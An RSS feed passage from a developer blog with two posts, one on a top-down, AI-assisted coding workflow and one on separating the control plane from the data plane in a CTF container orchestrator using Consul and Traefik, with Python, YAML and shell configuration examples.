<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Stack Unwind]]></title><description><![CDATA[Unfiltered CTF writeups and dev chronicles.Every misstep, dead end, and moment of profound confusion documented. Because the most valuable lessons emerge from h]]></description><link>https://blog.realrudrap.dev</link><generator>RSS for Node</generator><lastBuildDate>Sat, 11 Apr 2026 17:45:54 GMT</lastBuildDate><atom:link href="https://blog.realrudrap.dev/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[How I use AI in my Dev Workflow (without losing control)]]></title><description><![CDATA[While building Poseidon, a custom CTF focused container orchestrator and deploying OrcaCTF on AWS, Sumit asked how I incorporate AI into my development workflow. As I explained my process, I realized I’ve subconsciously developed a systematic framewo...]]></description><link>https://blog.realrudrap.dev/how-i-use-ai-in-my-dev-workflow-without-losing-control</link><guid isPermaLink="true">https://blog.realrudrap.dev/how-i-use-ai-in-my-dev-workflow-without-losing-control</guid><category><![CDATA[AI]]></category><category><![CDATA[software development]]></category><category><![CDATA[System Design]]></category><category><![CDATA[development workflow]]></category><dc:creator><![CDATA[Rudra Ponkshe]]></dc:creator><pubDate>Fri, 28 Nov 2025 05:30:39 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1764136330152/1755247a-b91e-4ff4-8053-3fcf574f3445.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>While building Poseidon, a custom CTF focused container orchestrator and deploying OrcaCTF on AWS, <a target="_blank" href="https://www.linkedin.com/in/steosumit/">Sumit</a> asked how I incorporate AI into my development workflow. As I explained my process, I realized I’ve subconsciously developed a systematic framework which keeps me in control while making the most of AI’s strengths.</p>
<p>This post isn’t about prompt engineering or which model is the best. It’s about having a methodology to ensure you use AI to accelerate your workflow without making you dependent on it or producing unmaintainable code.</p>
<h2 id="heading-my-4-phase-development-framework">My 4-phase development framework</h2>
<h3 id="heading-phase-1-solo-architecture-thinking-no-ai-yet">Phase 1: Solo Architecture Thinking ( No AI yet )</h3>
<p>Before touching any AI tool, I force a period of clean room thinking.</p>
<ul>
<li><p>Take time and think through the requirements</p>
</li>
<li><p>Research options using primary documentation</p>
</li>
<li><p>Outline a couple of architectural approaches</p>
</li>
<li><p>Document trade-offs for each architecture</p>
</li>
</ul>
<p>Example from Poseidon:</p>
<p>“Do I use AWS Lambda ( serverless, but 15 min execution limit ), Fargate ( managed containers, but complex per-container routing ) or build a custom orchestrator?”</p>
<p><strong>Why this matters:</strong> AI defaults to the "average" solution found in its training data. It lacks the specific context of your constraints (budget, timeline, team expertise). Only you can critically evaluate these trade-offs. Skipping this step leads to generic, sub-optimal architectures.</p>
<h3 id="heading-phase-2-architectural-validation-amp-refinement-enter-ai">Phase 2: Architectural Validation &amp; Refinement ( Enter AI )</h3>
<p>Once I have a satisfying outline, I treat the AI (Claude is my preference here) as a "Red Team" or a Critical Reviewer. The goal isn't "tell me how to build," but "tell me where this breaks."</p>
<p><strong>My validation checklist:</strong></p>
<ul>
<li><p><strong>Edge case detection:</strong> I am choosing X over Y because of Z. What failure modes am I not considering?</p>
</li>
<li><p><strong>Scale Analysis:</strong> Here’s my service mesh design. What breaks first at 10k concurrent users?</p>
</li>
<li><p><strong>Operational blindspots:</strong> I’m planning to use Consul for service discovery. What are the known operational headaches?</p>
<p>  <strong>The Goal:</strong> A theoretically stress-tested tech stack and infrastructure approach I am confident in, validated against patterns I might have missed.</p>
</li>
</ul>
<h3 id="heading-phase-3-top-down-code-skeleton-my-core-method">Phase 3: Top-down code skeleton ( my core method )</h3>
<p>This is where my approach diverges from “just start coding”, or “ask AI to build it”</p>
<p><strong>The Process:</strong></p>
<ol>
<li><p><strong>Define the high-level interface:</strong> Start at the highest level of abstraction using strict typing</p>
<pre><code class="lang-python"> <span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">request_instance</span>(<span class="hljs-params">user_id: str, challenge_id: str</span>) -&gt; Instance:</span>
     <span class="hljs-keyword">pass</span>
</code></pre>
</li>
<li><p><strong>Think through what this method needs:</strong></p>
<ul>
<li><p>Check user’s rate limits</p>
</li>
<li><p>Ensure there is no existing container associated with the user</p>
</li>
<li><p>Select the least loaded worker for deploying the container on</p>
</li>
<li><p>Register service to Consul</p>
</li>
<li><p>Save state to redis</p>
</li>
<li><p>Set up routing to specific container</p>
</li>
<li><p>Return a well-defined Instance object</p>
</li>
</ul>
</li>
<li><p><strong>Create “contract” stubs:</strong></p>
<pre><code class="lang-python"> <span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">select_best_worker</span>() -&gt; WorkerNode:</span>
     <span class="hljs-keyword">return</span> WorkerNode(node_id = <span class="hljs-string">"stub"</span>, address = <span class="hljs-string">"stub"</span>)

 <span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">request_spawn_container_on_worker</span>(<span class="hljs-params">
     worker : WorkerNode,
     challenge_image : str
 </span>) -&gt; Container:</span>
     <span class="hljs-keyword">return</span> Container(id=<span class="hljs-string">"stub"</span>,ip=<span class="hljs-string">"stub"</span>,port=<span class="hljs-number">8080</span>)

 <span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">register_service_in_consul</span>(<span class="hljs-params">
     container: Container,
     user_request: RequestChallenge
 </span>) -&gt; bool:</span>
     <span class="hljs-keyword">return</span> <span class="hljs-literal">True</span>
</code></pre>
</li>
<li><p><strong>Go deeper recursively:</strong> Each stub function gets broken down recursively into its own sub-functions until I hit the system boundaries (external APIs like Docker SDK, Consul client, Redis, etc. )</p>
</li>
<li><p><strong>Return dummy data in the correct shape:</strong> This is critical. Each stub returns properly typed data so the top level functions can “run” ( even if they do nothing real ).</p>
</li>
</ol>
<p><strong>Why this works:</strong></p>
<ul>
<li><p><strong>Control:</strong> I define the flow of execution and data structures.</p>
</li>
<li><p><strong>Isolation:</strong> Each function has a clear, single responsibility before implementation details muddy the waters.</p>
</li>
<li><p><strong>Debuggability:</strong> I can "run" the system with stubs to verify the logic flow before writing a single line of real infrastructure code.</p>
</li>
</ul>
<h3 id="heading-phase-4-bottom-up-implementation-ai-as-pair-programmer">Phase 4: Bottom-up implementation ( AI as pair programmer )</h3>
<p>With the interfaces defined, I switch to implementation. I work from the bottom up; starting with the functions that touch external APIs.</p>
<p>This is where AI shines. Since I have isolated the logic into a single stub, I can ask the AI to "Implement this specific function using the Docker SDK." The context is contained, preventing hallucinations. Although, it is still important to review all logic used in the AI-generated code to prevent any security compromises, and to catch any unknown assumptions the AI might’ve made.</p>
<p><strong>What changes during implementation:</strong></p>
<p>After each sprint ( implementing a single layer ), the dummy return values in the top-level function are replaced with real data. The function signature usually stays the same, but I occasionally realize that I need additional data fields.</p>
<p><strong>Example</strong></p>
<pre><code class="lang-python"><span class="hljs-comment"># Initial Stub</span>
<span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">provision_instance</span>(<span class="hljs-params">challenge_id: str, user_id: str</span>) -&gt; Instance:</span>
    worker = <span class="hljs-keyword">await</span> select_best_worker()  <span class="hljs-comment"># Dummy at first</span>
    container = <span class="hljs-keyword">await</span> spawn_container(worker, challenge_id)  <span class="hljs-comment"># Dummy</span>
    <span class="hljs-keyword">await</span> register_service(container)  <span class="hljs-comment"># Dummy</span>
    <span class="hljs-keyword">return</span> Instance(id=<span class="hljs-string">"stub"</span>, hostname=<span class="hljs-string">"stub"</span>)  <span class="hljs-comment"># Dummy</span>

<span class="hljs-comment"># After implementing select_best_worker()</span>
<span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">provision_instance</span>(<span class="hljs-params">challenge_id: str, user_id: str</span>) -&gt; Instance:</span>
    worker = <span class="hljs-keyword">await</span> select_best_worker()  <span class="hljs-comment"># Now returns real WorkerNode</span>
    container = <span class="hljs-keyword">await</span> spawn_container(worker, challenge_id)  <span class="hljs-comment"># Still dummy</span>
    <span class="hljs-keyword">await</span> register_service(container)  <span class="hljs-comment"># Still dummy</span>
    <span class="hljs-keyword">return</span> Instance(id=<span class="hljs-string">"stub"</span>, hostname=<span class="hljs-string">"stub"</span>, worker=worker)  <span class="hljs-comment"># Partially real</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1764148872568/c167776f-9030-4c84-85cc-ae3b44a0a246.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-the-challenge-data-shape-consistency">The Challenge: Data Shape Consistency</h2>
<p>A major risk in distributed systems is <strong>Schema Drift</strong>. In Poseidon, a "Worker" appears in multiple forms:</p>
<ol>
<li><p><strong>Redis:</strong> A JSON string.</p>
</li>
<li><p><strong>Internal Logic:</strong> A Python Object.</p>
</li>
<li><p><strong>API Response:</strong> A Pydantic model.</p>
</li>
<li><p><strong>gRPC:</strong> A Protobuf message.</p>
</li>
</ol>
<p>If you’re not careful, you end up with ad-hoc dictionaries <code>{"id": ...}</code> scattered everywhere. Debugging becomes a nightmare of key errors.</p>
<p><strong>My current solution:</strong> Explicit return types annotations everywhere.</p>
<pre><code class="lang-python"><span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">select_best_worker</span>() -&gt; WorkerNode:</span> <span class="hljs-comment"># forces me to return a WorkerNode</span>
    <span class="hljs-comment"># Can't accidentally return a dict or a string</span>
</code></pre>
<p>This doesn’t solve the problem entirely, but it forces me to think about data consistency upfront rather than during debugging.</p>
<p><strong>What I need to add:</strong></p>
<p><strong>Canonical Models &amp; Conversion Boundaries</strong></p>
<ol>
<li><p><strong>Canonical Form:</strong> A strict Pydantic model represents the entity within the application logic.</p>
</li>
<li><p><strong>Boundaries:</strong> Data is immediately converted to the Canonical Form when it enters the system (e.g., from Redis or API) and only converted out at the last moment.</p>
</li>
</ol>
<p>Python</p>
<pre><code class="lang-python"><span class="hljs-comment"># The Canonical Model (The Truth)</span>
<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">WorkerNode</span>(<span class="hljs-params">BaseModel</span>):</span>
    node_id: str
    address: IPv4Address
    load: int

<span class="hljs-comment"># Boundary: Redis -&gt; Canonical</span>
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">get_worker</span>(<span class="hljs-params">id: str</span>) -&gt; WorkerNode:</span>
    data = redis.get(id)
    <span class="hljs-keyword">return</span> WorkerNode(**json.loads(data)) <span class="hljs-comment"># Validation happens here</span>
</code></pre>
<p>This ensures that my AI-assisted implementation code never has to guess the shape of the data. It always receives and returns the Canonical Model.</p>
<h2 id="heading-the-missing-piece-robust-testing">The Missing Piece: Robust Testing</h2>
<p>I’ll be honest: <strong>I don't write enough tests.</strong> Like many solo projects, I rely heavily on manual verification, which works until it doesn't.</p>
<p>However, the "Top-Down" framework actually lays the perfect groundwork for a testing strategy I <em>should</em> be implementing. Because the system is built on isolated stubs and contracts, the path to robustness is clear, even if I haven't walked it yet:</p>
<ul>
<li><p><strong>The Plan for Unit Tests:</strong> Since <code>select_best_worker()</code> is an isolated stub, I can easily write a test that forces it to raise a <code>NoResourcesAvailable</code> error to see if the parent function handles it gracefully.</p>
</li>
<li><p><strong>The Plan for Integration:</strong> I can mock the "System Boundary" functions (Docker/Consul) to test the orchestration logic without spinning up real infrastructure.</p>
</li>
</ul>
<p>Right now, I am testing manually. But because the architecture is decoupled, adding these tests later won't require a rewrite; just discipline.</p>
<h2 id="heading-why-this-framework-works">Why this Framework Works</h2>
<p><strong>Architectural Clarity:</strong> I understand the system because I designed it. Not the AI</p>
<p><strong>AI as accelerator; not crutch :</strong> AI helps fill in the implementation details, not architectural decision</p>
<p><strong>Debuggability:</strong> Top down structures + explicit types make it easier to trace failures</p>
<p><strong>Incremental progress:</strong> Each sprint adds real functionality without breaking the overall structure.</p>
<h2 id="heading-when-this-doesnt-work"><strong>When this <em>doesn’t</em> work</strong></h2>
<p>This framework isn’t universal.</p>
<p>While this framework is excellent for architecting complex distributed systems, infrastructure, or anything with too many moving parts, it’s unnecessary for exploratory work.</p>
<p>When you’re simply trying to see whether an idea is viable, forcing a top-down process is self-inflicted pain. Build the crude prototype first; confirm the thing even deserves oxygen. Likewise, in well-trodden domains, this methodology adds little value. It wastes time that could be spent actually shipping something. You don’t need a grand design philosophy to churn out yet another CRUD app.</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td></td><td><strong>Simple Domain</strong></td><td><strong>Complex Domain</strong></td></tr>
</thead>
<tbody>
<tr>
<td><strong>High Stakes</strong></td><td>May be an overkill ( but safe )</td><td>Use the Framework</td></tr>
<tr>
<td><strong>Low Stakes ( Learning )</strong></td><td>Overkill, Just hack it</td><td>Use Framework (learn deeply)</td></tr>
</tbody>
</table>
</div><p><strong>TLDR:</strong> If the cost of failure is high, plan the interface. If the cost of failure is low, just build it</p>
<h2 id="heading-lessons-i-learnt">Lessons I learnt:</h2>
<ol>
<li><p><strong>Start architectural conversations with AI, not direct implementation:</strong></p>
<ul>
<li><p>“I’m considering X vs Y for Z reason. What am I missing?”</p>
</li>
<li><p>Not: “Write me a container orchestrator”</p>
</li>
</ul>
</li>
<li><p><strong>Spend time designing the system before churning out actual code:</strong></p>
<ul>
<li><p>What are the 3-5 functions I need at the top level of abstraction?</p>
</li>
<li><p>What do they return and expect as parameters?</p>
</li>
<li><p>What do they need from each other?</p>
</li>
</ul>
</li>
<li><p><strong>Use type annotations religiously:</strong></p>
<ul>
<li><p>Forces consistent data shapes</p>
</li>
<li><p>Makes AI suggestions more accurate</p>
</li>
<li><p>Catches potential bugs at design time</p>
</li>
</ul>
</li>
<li><p><strong>Design top-down, implement bottom-up:</strong></p>
<ul>
<li><p>Start designing with your functions acting as providers and work your way down to the functions which consume other APIs</p>
</li>
<li><p>Implement functions talking to external APIs first and work your way up replacing stubs with real functions incrementally.</p>
</li>
</ul>
</li>
<li><p><strong>Review your data models before implementing:</strong></p>
<ul>
<li><p>How many ways are you representing the same entity?</p>
</li>
<li><p>Can you reduce it to one canonical form?</p>
</li>
</ul>
</li>
</ol>
<h2 id="heading-conclusion">Conclusion</h2>
<p>AI is an incredible accelerator for building complex systems, but only if you stay in the driver's seat.</p>
<p>My framework keeps architectural decisions and system invariants in my control, while delegating the implementation details to the AI. The result is a system I can operate, debug, and evolve without guessing.</p>
<hr />
<p>Related: Building Poseidon <a target="_blank" href="https://hashnode.com/post/cmh8p84e9001902jr0l2id7iu">Part 1</a> | <a target="_blank" href="https://hashnode.com/post/cmhipb89k000802jl1yz0bhf5">Part 2</a> | <a target="_blank" href="https://hashnode.com/post/cmhspet0h000002ju1bbcckz4">Part 3</a></p>
]]></content:encoded></item><item><title><![CDATA[Building Poseidon #3: Control Plane vs Data Plane]]></title><description><![CDATA[In Part 2, I built the Master-Worker orchestration core: gRPC communication, container spawning and basic routing. It worked locally. Containers spun up, users got unique subdomains and traffic routed correctly.
Then I realized the architecture had a...]]></description><link>https://blog.realrudrap.dev/building-poseidon-3-control-plane-vs-data-plane</link><guid isPermaLink="true">https://blog.realrudrap.dev/building-poseidon-3-control-plane-vs-data-plane</guid><category><![CDATA[distributed system]]></category><category><![CDATA[Docker]]></category><category><![CDATA[Orchestration]]></category><category><![CDATA[CTF]]></category><category><![CDATA[software architecture]]></category><dc:creator><![CDATA[Rudra Ponkshe]]></dc:creator><pubDate>Mon, 10 Nov 2025 05:30:43 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1762669817577/5d1608dc-d043-4f87-9d8f-756f6924beef.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>In <a target="_blank" href="https://hashnode.com/post/cmhipb89k000802jl1yz0bhf5">Part 2</a>, I built the Master-Worker orchestration core: gRPC communication, container spawning and basic routing. It worked locally. Containers spun up, users got unique subdomains and traffic routed correctly.</p>
<p>Then I realized the architecture had a fundamental flaw.</p>
<h2 id="heading-the-problem-master-as-a-single-point-of-failure">The Problem: Master as a Single Point of Failure</h2>
<p>My initial design had centralized routing. The Master instance handled both Orchestration ( deciding which worker runs a container ) and routing ( directing traffic to that container ). This created two problems:</p>
<p><strong>Problem 1: Availability</strong> If the Master crashed, users lost access to running containers, even though the containers were still alive on the Worker nodes. The control plane failure restricted access to the data plane.</p>
<p><strong>Problem 2: Scalability</strong> The Master became a routing bottleneck. All traffic flowed through it, limiting horizontal scaling. We could add more workers, but routing capacity stays fixed.</p>
<p>This violates a core principle: <strong>separate the control plane from the data plane</strong></p>
<h2 id="heading-the-solution-service-mesh-with-consul-and-traefik">The Solution: Service Mesh with Consul and Traefik</h2>
<p>After reading Consul’s documentation and reading about service mesh patterns, the solution was clear:</p>
<ul>
<li><p><strong>Master ( Control Plane ):</strong> Orchestrates container lifecycle, maintaining state in Redis, registers services in Consul</p>
</li>
<li><p><strong>Workers ( Data Plane ):</strong> Run containers, run Traefik instances, route traffic based on Consul’s service catalog</p>
</li>
<li><p><strong>Consul:</strong> Single source of truth for service discovery and routing metadata.</p>
</li>
</ul>
<p>The Master never touches production traffic. It just tells Consul, “container X is at IP Y on port Z with hostname H”. Every worker’s Traefik watches Consul and builds routing rules dynamically.</p>
<h2 id="heading-the-new-architecture">The New Architecture</h2>
<pre><code class="lang-plaintext">User Request (a3f4b92c8d.orcactf.app)
    ↓
DNS Resolution (will point to NLB on AWS)
    ↓
Any Worker's Traefik (via load balancer)
    ↓
Consul Lookup: "Which IP:port has this hostname?"
    ↓
Forward to Container (possibly on different worker)
    ↓
Container responds
</code></pre>
<p><strong>Key Insight:</strong> Any Traefik instance can route to any container, even if that container isn’t on the same worker. They all read from the same Consul Catalog.</p>
<p>This means:</p>
<ul>
<li><p>Master crash doesn’t affect routing.</p>
</li>
<li><p>Routing scales horizontally ( N workers = N Traefik instances )</p>
</li>
<li><p>Clear separation: Master orchestrates, Workers route</p>
</li>
<li><p>Adding a Worker adds both compute and network routing capacity</p>
</li>
</ul>
<h2 id="heading-implementation-service-registration-in-consul">Implementation: Service Registration in Consul</h2>
<p>When the Master provisions a container, it now registers the service in Consul instead of updating Traefik configs:</p>
<pre><code class="lang-python"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">CatalogManager</span>:</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__init__</span>(<span class="hljs-params">self, consul_host: str, consul_port: int</span>):</span>
        self.client = consul.aio.Consul(host=consul_host, port=consul_port)

    <span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">register_route</span>(<span class="hljs-params">self, route_def: RouteDefinition, worker_node: WorkerNode</span>):</span>
        service_id = <span class="hljs-string">f"instance-<span class="hljs-subst">{route_def.instance_id}</span>"</span>
        protocol = route_def.protocol.value.lower()  <span class="hljs-comment"># 'http' or 'tcp'</span>

        tags = [
            <span class="hljs-string">"traefik.enable=true"</span>,
            <span class="hljs-string">f"traefik.<span class="hljs-subst">{protocol}</span>.routers.<span class="hljs-subst">{service_id}</span>.rule=Host(`<span class="hljs-subst">{route_def.hostname}</span>`)"</span>,
            <span class="hljs-string">f"traefik.<span class="hljs-subst">{protocol}</span>.routers.<span class="hljs-subst">{service_id}</span>.entrypoints=challenge-web"</span>,
            <span class="hljs-string">f"traefik.<span class="hljs-subst">{protocol}</span>.services.<span class="hljs-subst">{service_id}</span>.loadbalancer.server.port=<span class="hljs-subst">{route_def.backend_port}</span>"</span>
        ]

        <span class="hljs-keyword">await</span> self.client.agent.service.register(
            name=<span class="hljs-string">f"instance-svc-<span class="hljs-subst">{route_def.instance_id}</span>"</span>,
            service_id=service_id,
            address=route_def.backend_ip,  <span class="hljs-comment"># Container's internal IP</span>
            port=route_def.backend_port,
            tags=tags
        )
</code></pre>
<p><strong>What’s tagged here:</strong></p>
<ol>
<li><p><strong>Service ID:</strong> Unique identifier for this container instance</p>
</li>
<li><p><strong>Traefik Tags:</strong> Embedding routing rules that Traefik reads from Consul</p>
</li>
<li><p><strong>Address/Ports:</strong> Where the container is actually running ( internal Docker network IP )</p>
</li>
</ol>
<p>When a container terminates, we de-register:</p>
<pre><code class="lang-python"><span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">deregister_route</span>(<span class="hljs-params">self, instance_id: str</span>):</span>
    service_id = <span class="hljs-string">f"instance-<span class="hljs-subst">{instance_id}</span>"</span>
    <span class="hljs-keyword">await</span> self.client.agent.service.deregister(service_id)
</code></pre>
<p>Simple. The Master completes its job of writing to Consul and moves on.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1762739605897/aad1df76-4824-488e-a00e-9c8da834274e.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-implementation-traefik-as-consul-catalog-consumer">Implementation: Traefik as Consul Catalog Consumer</h2>
<p>Each Worker runs a Traefik instance configured to watch Consul:</p>
<pre><code class="lang-yaml"><span class="hljs-comment"># traefik.yml on each worker</span>

<span class="hljs-attr">log:</span>
  <span class="hljs-attr">level:</span> <span class="hljs-string">DEBUG</span>

<span class="hljs-attr">api:</span>
  <span class="hljs-attr">insecure:</span> <span class="hljs-literal">true</span> <span class="hljs-comment"># Only for local dev, will be changed in production</span>
  <span class="hljs-attr">dashboard:</span> <span class="hljs-literal">true</span> <span class="hljs-comment"># For debugging, will be disabled in production</span>

<span class="hljs-attr">entryPoints:</span>
  <span class="hljs-attr">traefik:</span>
    <span class="hljs-attr">address:</span> <span class="hljs-string">":8181"</span>  <span class="hljs-comment"># Dashboard</span>

  <span class="hljs-attr">challenge-tcp:</span>
    <span class="hljs-attr">address:</span> <span class="hljs-string">":2222"</span>  <span class="hljs-comment"># For SSH/TCP challenges</span>

  <span class="hljs-attr">challenge-web:</span>
    <span class="hljs-attr">address:</span> <span class="hljs-string">":8080"</span>  <span class="hljs-comment"># For HTTP challenges</span>

<span class="hljs-attr">providers:</span>
  <span class="hljs-attr">consulCatalog:</span>
    <span class="hljs-attr">endpoint:</span>
      <span class="hljs-attr">address:</span> <span class="hljs-string">"127.0.0.1:8500"</span>
      <span class="hljs-attr">scheme:</span> <span class="hljs-string">"http"</span>

    <span class="hljs-comment"># Only services tagged with traefik.enable=true</span>
    <span class="hljs-attr">constraints:</span> <span class="hljs-string">"Tag(`traefik.enable=true`)"</span>

    <span class="hljs-comment"># Don't auto-expose everything in Consul</span>
    <span class="hljs-attr">exposedByDefault:</span> <span class="hljs-literal">false</span>

    <span class="hljs-comment"># Look for tags prefixed with 'traefik'</span>
    <span class="hljs-attr">prefix:</span> <span class="hljs-string">"traefik"</span>
</code></pre>
<p>Traefik polls Consul every few seconds, discovers services with <code>traefik.enable=true</code>, reads their tags, and dynamically generates routing rules.</p>
<p><strong>No config files to update. No restarts required. Pure service discovery.</strong></p>
<h2 id="heading-the-worker-bootstrap-process">The Worker Bootstrap Process</h2>
<p>Each Worker needs to run three processes: Consul agent, Traefik, and the gRPC worker server. We use <code>supervisord</code> to manage them:</p>
<pre><code class="lang-ini"><span class="hljs-section">[supervisord]</span>
<span class="hljs-attr">nodaemon</span>=<span class="hljs-literal">true</span>

<span class="hljs-section">[program:consul]</span>
<span class="hljs-attr">command</span>=consul agent -node-id=%%INSTANCE_ID%% \
  <span class="hljs-attr">-data-dir</span>=/consul/data \
  <span class="hljs-attr">-config-dir</span>=/consul/config \
  <span class="hljs-attr">-retry-join</span>=<span class="hljs-string">"consul"</span> \
  <span class="hljs-attr">-client</span>=<span class="hljs-string">"0.0.0.0"</span> \
  <span class="hljs-attr">-enable-local-script-checks</span>=<span class="hljs-literal">true</span>
<span class="hljs-attr">autostart</span>=<span class="hljs-literal">true</span>
<span class="hljs-attr">autorestart</span>=<span class="hljs-literal">true</span>

<span class="hljs-section">[program:traefik]</span>
<span class="hljs-attr">command</span>=traefik --configfile=/etc/traefik/traefik.yml
<span class="hljs-attr">autostart</span>=<span class="hljs-literal">true</span>
<span class="hljs-attr">autorestart</span>=<span class="hljs-literal">true</span>

<span class="hljs-section">[program:poseidon-worker]</span>
<span class="hljs-attr">command</span>=python -m src.main
<span class="hljs-attr">autostart</span>=<span class="hljs-literal">true</span>
<span class="hljs-attr">autorestart</span>=<span class="hljs-literal">true</span>
</code></pre>
<p>The entrypoint script generates a unique worker ID ( locally for now, will use instance ID when used on AWS ) and starts all three processes:</p>
<pre><code class="lang-bash"><span class="hljs-meta">#!/bin/sh</span>
<span class="hljs-built_in">set</span> -e

INSTANCE_ID=$(uuidgen)
<span class="hljs-built_in">echo</span> <span class="hljs-string">"Worker node identified as: <span class="hljs-variable">${INSTANCE_ID}</span>"</span>

<span class="hljs-comment"># Template substitution for configs</span>
sed <span class="hljs-string">"s/%%INSTANCE_ID%%/<span class="hljs-variable">${INSTANCE_ID}</span>/g"</span> \
  /etc/supervisor/conf.d/supervisord.conf.template &gt; /tmp/supervisord.conf

sed <span class="hljs-string">"s/%%INSTANCE_ID%%/<span class="hljs-variable">${INSTANCE_ID}</span>/g"</span> \
  /consul/config/worker-service.json.template &gt; /consul/config/worker-service.json

<span class="hljs-built_in">exec</span> /usr/bin/supervisord -c /tmp/supervisord.conf
</code></pre>
<p>Each Worker joins the Consul cluster, registers health check, and starts accepting gRPC requests from the Master.</p>
<h2 id="heading-what-broke-the-traefik-tag-nightmare">What Broke: The Traefik Tag Nightmare</h2>
<p>This all sounds clean in retrospect. In practice, getting Traefik to generate routes correctly took hours.</p>
<p><strong>The Problem:</strong> Traefik was auto-generating routing rules based on the service name (<code>instance-svc-{uuid}</code>), not the hostname we wanted. Users would hit <a target="_blank" href="http://a3f4b92c8d.orcactf.app"><code>a3f4b92c8d.orcactf.app</code></a>, and Traefik would return 404 because it had created a route for <a target="_blank" href="http://instance-svc-3f053024-2418-4b4c-97d1-0590c5d9f480.orcactf.app"><code>instance-svc-3f053024-2418-4b4c-97d1-0590c5d9f480.orcactf.app</code></a>.</p>
<p><strong>The Root Cause:</strong> Traefik’s Consul provider has “smart” defaults which infer routing rules from service metadata. It was <em>too smart</em>, overriding our tags with it’s own generated rules.</p>
<p><strong>The Fix:</strong> Two critical config changes:</p>
<ol>
<li><p>Set <code>exposedByDefault: false</code> in <code>traefik.yml</code></p>
<ul>
<li><p>Forces Traefik to only process services explicitly tagged with <code>traefik.enable=true</code></p>
</li>
<li><p>Disables auto-route generation</p>
</li>
</ul>
</li>
<li><p><strong>Use explicit router rules in tags:</strong></p>
<pre><code class="lang-python"> <span class="hljs-string">f"traefik.<span class="hljs-subst">{protocol}</span>.routers.<span class="hljs-subst">{service_id}</span>.rule=Host(`<span class="hljs-subst">{route_def.hostname}</span>`)"</span>
</code></pre>
<ul>
<li><p>Overrides Traefik’s default rule generation</p>
</li>
<li><p>Ensures we control the hostname matching logic</p>
</li>
</ul>
</li>
</ol>
<p>After these changes, routes worked perfectly. But this took reading through <a target="_blank" href="https://doc.traefik.io/traefik/reference/install-configuration/providers/hashicorp/consul-catalog/">Traefik’s Consul provider documentation</a> quite a few times to understand the rules.</p>
<p><strong>Lesson learned:</strong> When integrating tools that "just work," the hard part is understanding what they do automatically and how to override it when needed.</p>
<h2 id="heading-whats-still-missing">What’s Still Missing</h2>
<p>This works locally. AWS deployment will add complexity:</p>
<ol>
<li><p><strong>Network Load Balancer:</strong></p>
<p> Currently testing with direct Traefik access. In production, a NLB will front all workers, and the flow becomes</p>
<pre><code class="lang-plaintext"> DNS → Route53 → NLB → Worker Traefik → Container
</code></pre>
</li>
<li><p><strong>Multi-node Consul Cluster</strong></p>
<p> Right now, we have a single Consul server. If we ever scale this, we’ll need a 3-node cluster for HA (high availability). If Consul dies, routing goes down.</p>
</li>
<li><p><strong>VPC Networking:</strong></p>
<p> Workers need appropriate security group rules allowing inbound traffic from the NLB, inbound access from other workers and outbound to other workers</p>
</li>
<li><p><strong>TLS/HTTPS:</strong></p>
<p> Currently running on HTTP only, we need to implement Traefik’s TLS termination and Let’s Encrypt/AWS Certificate Manager</p>
</li>
<li><p><strong>The Reaper Proces:</strong></p>
<p> Containers have TTLs. We need a background process that:</p>
<ul>
<li><p>Polls Redis for expired instances</p>
</li>
<li><p>Call <code>deprovision_instance()</code> for each of them</p>
</li>
<li><p>Handle orphaned containers ( if Master crashes before cleanup )</p>
</li>
</ul>
</li>
</ol>
<p>This is infrastructure work, not architecture work. The hard part of designing and implementing the system is done.</p>
<h2 id="heading-failure-mode-analysis">Failure Mode Analysis</h2>
<p>Let's validate that we actually improved resilience:</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td><strong>Failure</strong></td><td><strong>Old Architecture</strong></td><td><strong>New Architecture</strong></td></tr>
</thead>
<tbody>
<tr>
<td>Master Crashes</td><td>Routing dies, users disconnected</td><td>Routing unaffected, orchestration paused</td></tr>
<tr>
<td>Worker Crashes</td><td>Only it’s containers die</td><td>Only it’s containers die, NLB removes from pool</td></tr>
<tr>
<td>Traefik crashes (single)</td><td>All routing dies</td><td>Other Traefik’s compensate</td></tr>
<tr>
<td>Consul crashes (single node)</td><td>N/A</td><td>Routing breaks (needs multi-node cluster)</td></tr>
</tbody>
</table>
</div><p><strong>Net improvement:</strong> I eliminated the "Master down = routing down" failure mode, which was the biggest architectural risk.</p>
<h2 id="heading-horizontal-scaling-the-math">Horizontal Scaling: The Math</h2>
<p><strong>Old architecture:</strong></p>
<ul>
<li><p>1 Master with Traefik = fixed routing capacity</p>
</li>
<li><p>Add workers = more compute, same routing bottleneck</p>
</li>
</ul>
<p><strong>New architecture:</strong></p>
<ul>
